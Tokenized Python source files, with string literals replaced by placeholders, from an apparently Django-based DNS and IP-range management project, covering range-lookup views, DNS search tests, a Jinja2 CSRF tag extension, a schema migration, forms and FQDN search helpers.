'<STR_LIT>' : mrange , <EOL> '<STR_LIT>' : attrs , <EOL> } ) <EOL> def redirect_to_range_from_ip ( request ) : <EOL> ip_str = request . GET . get ( '<STR_LIT>' ) <EOL> ip_type = request . GET . get ( '<STR_LIT>' ) <EOL> if not ( ip_str and ip_type ) : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> if ip_type == '<STR_LIT:4>' : <EOL> try : <EOL> ip_upper , ip_lower = <NUM_LIT:0> , int ( ipaddr . IPv4Address ( ip_str ) ) <EOL> except ipaddr . AddressValueError : <EOL> return HttpResponse ( <EOL> json . dumps ( { '<STR_LIT:success>' : False , '<STR_LIT:message>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( ip_str ) } ) ) <EOL> else : <EOL> try : <EOL> ip_upper , ip_lower = ipv6_to_longs ( ip_str ) <EOL> except ValidationError : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT:success>' : False , <EOL> '<STR_LIT:message>' : '<STR_LIT>' } ) ) <EOL> range_ = Range . objects . filter ( start_upper__lte = ip_upper , <EOL> start_lower__lte = ip_lower , <EOL> end_upper__gte = ip_upper , <EOL> end_lower__gte = ip_lower ) <EOL> if not len ( range_ ) == <NUM_LIT:1> : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> else : <EOL> return HttpResponse ( json . dumps ( <EOL> { '<STR_LIT:success>' : True , <EOL> '<STR_LIT>' : range_ [ <NUM_LIT:0> ] . get_absolute_url ( ) } ) ) <EOL> def get_next_available_ip_by_range ( request , range_id ) : <EOL> range = get_object_or_404 ( Range , id = range_id ) <EOL> ret = { } <EOL> ret_ip = range . get_next_ip ( ) <EOL> display_ip = ret_ip . exploded <EOL> ret [ '<STR_LIT:success>' ] = True <EOL> ret [ '<STR_LIT>' ] = display_ip <EOL> return HttpResponse ( json . dumps ( ret ) ) <EOL> def find_related ( request ) : <EOL> """<STR_LIT>""" <EOL> state = json . loads ( request . raw_post_data ) <EOL> if not state : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' not in state : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> try : <EOL> choice_type , choice_pk = state [ '<STR_LIT>' ] <EOL> except ValueError : <EOL> raise Exception ( <EOL> "<STR_LIT>" . format ( state [ '<STR_LIT>' ] ) <EOL> ) <EOL> filter_network , filter_site , filter_vlan = calculate_filters ( <EOL> choice_type , choice_pk <EOL> ) <EOL> format_network , format_site , format_vlan = label_value_maker ( ) <EOL> new_state = { <EOL> '<STR_LIT>' : format_site ( filter_site ( state [ '<STR_LIT>' ] ) ) , <EOL> '<STR_LIT>' : format_vlan ( filter_vlan ( state [ '<STR_LIT>' ] ) ) , <EOL> } <EOL> networks = filter_network ( state [ '<STR_LIT>' ] ) <EOL> if len ( networks ) == <NUM_LIT:1> : <EOL> new_state [ '<STR_LIT>' ] = integrate_real_ranges ( <EOL> networks [ <NUM_LIT:0> ] , calc_template_ranges ( networks [ <NUM_LIT:0> ] ) <EOL> ) <EOL> new_state [ '<STR_LIT>' ] = format_network ( networks ) <EOL> return HttpResponse ( json . dumps ( new_state ) ) <EOL> def ajax_find_related ( request ) : <EOL> networks = Network . objects . filter ( UN ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : Site . objects . all ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> '<STR_LIT>' : Vlan . objects . all ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> '<STR_LIT>' : networks <EOL> } ) <EOL> def debug_show_ranges ( request ) : <EOL> """<STR_LIT>""" <EOL> networks = Network . objects . filter ( UN ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : calc_template_ranges , <EOL> '<STR_LIT>' : networks <EOL> } ) </s>
<s> from django . test import TestCase <EOL> from mozdns . tests . utils import create_fake_zone <EOL> from mozdns . ptr . models import PTR <EOL> from mozdns . cname . models import CNAME <EOL> from mozdns . address_record . models import AddressRecord <EOL> from core . search . compiler . django_compile import compile_to_django <EOL> class SearchDNSTests ( TestCase ) : <EOL> def test_integration1 ( self ) : <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> def test_integration2 ( self ) : <EOL> root_domain = create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> ptr = PTR ( name = "<STR_LIT>" , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT>" ) <EOL> ptr . save ( ) <EOL> addr = AddressRecord ( label = "<STR_LIT>" , domain = root_domain , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT>" ) <EOL> addr . save ( ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> def test_integration3_zone ( self ) : <EOL> root_domain = create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> cn = CNAME ( label = "<STR_LIT>" , domain = root_domain , target = "<STR_LIT>" ) <EOL> cn . save ( ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> def test_integration4_ip_range ( self ) : <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> ptr = PTR ( name = "<STR_LIT>" , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT>" ) <EOL> ptr . save ( ) <EOL> res , error = compile_to_django ( ptr . ip_str ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> def test_integration5_ip ( self ) : <EOL> root_domain = create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> ptr = PTR ( name = "<STR_LIT>" , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT:4>" ) <EOL> ptr . save ( ) <EOL> addr = AddressRecord ( label = "<STR_LIT>" , domain = root_domain , <EOL> ip_str = "<STR_LIT>" , ip_type = "<STR_LIT:4>" ) <EOL> addr . save ( ) <EOL> res , error = compile_to_django ( ptr . ip_str ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) </s>
<s> class Refresher ( object ) : <EOL> def refresh ( self ) : <EOL> return self . __class__ . objects . get ( pk = self . pk ) </s>
<s> from jinja2 import nodes <EOL> from jinja2 . ext import Extension <EOL> from django . utils . safestring import mark_safe <EOL> import traceback <EOL> class CsrfExtension ( Extension ) : <EOL> tags = set ( [ '<STR_LIT>' ] ) <EOL> def __init__ ( self , environment ) : <EOL> self . environment = environment <EOL> def parse ( self , parser ) : <EOL> try : <EOL> token = parser . stream . next ( ) <EOL> return nodes . Output ( [ self . call_method ( '<STR_LIT>' , [ nodes . Name ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ] ) . set_lineno ( token . lineno ) <EOL> except : <EOL> traceback . print_exc ( ) <EOL> def _render ( self , csrf_token ) : <EOL> """<STR_LIT>""" <EOL> if csrf_token : <EOL> if csrf_token == '<STR_LIT>' : <EOL> return mark_safe ( u"<STR_LIT>" ) <EOL> else : <EOL> return mark_safe ( u"<STR_LIT>" % ( csrf_token ) ) <EOL> else : <EOL> from django . conf import settings <EOL> if settings . DEBUG : <EOL> import warnings <EOL> warnings . warn ( "<STR_LIT>" ) <EOL> return u'<STR_LIT>' <EOL> csrf_token = CsrfExtension </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> from django . db import connection <EOL> sql = """<STR_LIT>""" <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( sql ) <EOL> def backwards ( self , orm ) : <EOL> pass <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from haystack import indexes <EOL> from mozdns . domain . models import Domain <EOL> class DomainIndex ( indexes . SearchIndex , indexes . Indexable ) : <EOL> text = indexes . CharField ( document = True , use_template = True ) <EOL> name = indexes . CharField ( model_attr = '<STR_LIT:name>' ) <EOL> def index_queryset ( self ) : <EOL> return self . get_model ( ) . objects . all ( ) <EOL> def get_model ( self ) : <EOL> return Domain </s>
<s> from django import forms <EOL> from mozdns . mx . models import MX <EOL> from mozdns . forms import BaseForm <EOL> class MXForm ( BaseForm ) : <EOL> class Meta : <EOL> model = MX <EOL> exclude = ( '<STR_LIT>' , ) <EOL> widgets = { '<STR_LIT>' : forms . CheckboxSelectMultiple } <EOL> class FQDNMXForm ( BaseForm ) : <EOL> class Meta : <EOL> model = MX <EOL> exclude = ( '<STR_LIT:label>' , '<STR_LIT>' ) <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' ) <EOL> widgets = { '<STR_LIT>' : forms . CheckboxSelectMultiple } </s>
<s> from django . db . models import Q <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> import mozdns <EOL> import core <EOL> def fqdn_search ( fqdn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _build_queries ( fqdn , * args , ** kwargs ) <EOL> def smart_fqdn_exists ( fqdn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> search_domain = mozdns . domain . models . Domain . objects . get ( name = fqdn ) <EOL> label = '<STR_LIT>' <EOL> except ObjectDoesNotExist : <EOL> search_domain = None <EOL> if search_domain : <EOL> for type_ , qset in _build_label_domain_queries ( label , search_domain , <EOL> ** kwargs ) : <EOL> if qset . exists ( ) : <EOL> return qset <EOL> search_domain = None <EOL> if len ( fqdn . split ( '<STR_LIT:.>' ) ) == <NUM_LIT:1> : <EOL> return None <EOL> try : <EOL> label = fqdn . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> domain_name = '<STR_LIT:.>' . join ( fqdn . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] ) <EOL> search_domain = mozdns . domain . models . Domain . objects . get ( <EOL> name = domain_name ) <EOL> except ObjectDoesNotExist : <EOL> search_domain = None <EOL> if search_domain : <EOL> for type_ , qset in _build_label_domain_queries ( label , search_domain , <EOL> ** kwargs ) : <EOL> if qset . exists ( ) : <EOL> return qset <EOL> def _build_label_domain_queries ( label , domain , mx = True , sr = True , tx = True , <EOL> cn = True , ar = True , sreg = True , ns = True , ss = True ) : <EOL> qsets = [ ] <EOL> if mx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . mx . models . MX . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if ns : <EOL> if label == '<STR_LIT>' : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . nameserver . models . Nameserver . objects . <EOL> filter ( ** { '<STR_LIT>' : domain } ) ) ) <EOL> if sr : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . srv . models . SRV . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if tx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . txt . models . TXT . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if ss : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . sshfp . models . SSHFP . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if cn : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . cname . models . CNAME . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if ar : <EOL> AddressRecord = mozdns . address_record . models . AddressRecord <EOL> ars = AddressRecord . objects . filter ( <EOL> ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) <EOL> qsets . append ( ( '<STR_LIT>' , ars ) ) <EOL> if sreg : <EOL> StaticReg = core . registration . static . models . StaticReg <EOL> sregs = StaticReg . objects . filter ( <EOL> ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) <EOL> qsets . append ( ( '<STR_LIT>' , sregs ) ) <EOL> return qsets <EOL> def fqdn_exists ( fqdn , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for type_ , qset in _build_queries ( fqdn , ** kwargs ) : <EOL> if qset . exists ( ) : <EOL> return qset <EOL> return False <EOL> def _build_queries ( fqdn , dn = True , mx = True , sr = True , tx = True , <EOL> cn = True , ar = True , pt = True , ip = False , sreg = True , <EOL> search_operator = '<STR_LIT>' ) : <EOL> qsets = [ ] <EOL> if dn : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . domain . models . Domain . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if mx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . mx . models . MX . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if sr : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . srv . models . SRV . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if tx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . txt . models . TXT . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if cn : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . cname . models . CNAME . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if ar : <EOL> AddressRecord = mozdns . address_record . models . AddressRecord <EOL> ars = AddressRecord . objects . filter ( Q ( fqdn = fqdn ) | Q ( ip_str = ip ) ) <EOL> qsets . append ( ( '<STR_LIT>' , ars ) ) <EOL> if pt : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . ptr . models . PTR . objects . <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) | <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : ip } ) ) ) <EOL> if sreg : <EOL> StaticReg = core . registration . static . models . StaticReg <EOL> qsets . append ( ( '<STR_LIT>' , StaticReg . objects . filter ( <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) | <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : ip } ) ) ) ) <EOL> return qsets </s>
<s> import random <EOL> import string <EOL> from mozdns . create_zone . views import create_zone_ajax <EOL> from django . test import RequestFactory <EOL> def get_post_data ( random_str , suffix ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( random_str , suffix ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def create_fake_zone ( random_str , suffix = "<STR_LIT>" ) : <EOL> factory = RequestFactory ( ) <EOL> post_data = get_post_data ( random_str , suffix = suffix ) <EOL> request = factory . post ( "<STR_LIT>" , post_data ) <EOL> create_zone_ajax ( request ) <EOL> from mozdns . domain . models import Domain <EOL> return Domain . objects . get ( name = post_data [ '<STR_LIT>' ] ) <EOL> def random_label ( ) : <EOL> """<STR_LIT>""" <EOL> label = '<STR_LIT>' <EOL> for i in range ( random . randint ( <NUM_LIT:5> , <NUM_LIT:30> ) ) : <EOL> label += string . letters [ random . randint ( <NUM_LIT:0> , len ( string . letters ) - <NUM_LIT:1> ) ] <EOL> return label <EOL> def random_byte ( ) : <EOL> """<STR_LIT>""" <EOL> return random . randint ( <NUM_LIT:1> , <NUM_LIT:255> ) </s>
